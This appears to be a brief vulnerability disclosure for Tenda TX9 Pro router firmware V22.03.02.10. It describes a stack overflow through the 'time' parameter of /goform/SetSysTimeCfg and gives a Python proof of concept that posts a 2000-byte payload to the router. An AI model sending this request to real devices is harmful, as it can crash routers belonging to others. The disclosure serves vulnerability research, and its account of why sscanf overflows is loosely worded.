- Firmware download website: https://www.tendacn.com/download/detail-4219.html
TX9 Pro Firmware V22.03.02.10
The Tenda TX9 Pro Firmware V22.03.02.10 firmware has a stack overflow vulnerability in the sub_42D4DC
function. The v2
variable receives the timeType
parameter from a POST request and we let v2=="sync"
to execute LABEL_3
.
The v7
variable receives the time
parameter from a POST request. However, since the user can control the input of time
, the statement if ( sscanf(v7, " %d-%d-%d %d:%d:%d", &v14, &v13, &v12[12], &v12[8], &v12[4], v12) == 6 )
can cause a buffer overflow. The user-provided time
can exceed the capacity of the v12~v14
array, triggering this security vulnerability.
import requests
from pwn import*
ip = "192.168.84.101"
url = "http://" + ip + "/goform/SetSysTimeCfg"
payload = b"a"*2000
data = {
'timeType':'sync',
'time':payload,
}
response = requests.post(url, data=data)
print(response.text)